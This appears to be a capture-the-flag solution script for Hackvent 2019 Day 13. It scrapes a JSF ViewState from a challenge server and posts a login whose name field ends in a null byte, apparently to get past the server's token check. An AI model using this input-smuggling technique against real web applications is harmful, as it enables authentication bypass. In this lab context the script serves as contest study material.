Hackvent_2019/Day 13/exploit.py

#!/usr/bin/python

import requests
from bs4 import BeautifulSoup as bs

URL = "http://whale.hacking-lab.com:8888/trieme/index.xhtml"

session = requests.session()

# Get view state
response = session.get(URL)
if response.status_code != 200:
    print("Server returned %d %s" % (response.status_code, response.reason))
    exit(1)

html = bs(response.text, 'lxml')
viewState = html.find("input", { "id": "javax.faces.ViewState" })
if viewState is None:
    print("Could not find javax.faces.ViewState")
    exit(2)

params = {
    "j_idt14": "j_idt14",
    "j_idt14:j_idt15": "login",
    "j_idt14:name": "auth_token_4835989\0",
    "javax.faces.ViewState": viewState['value']
}

response = session.post(URL, data=params)
if response.status_code != 200:
    print("Server returned %d %s" % (response.status_code, response.reason))
    exit(1)

print(response.text)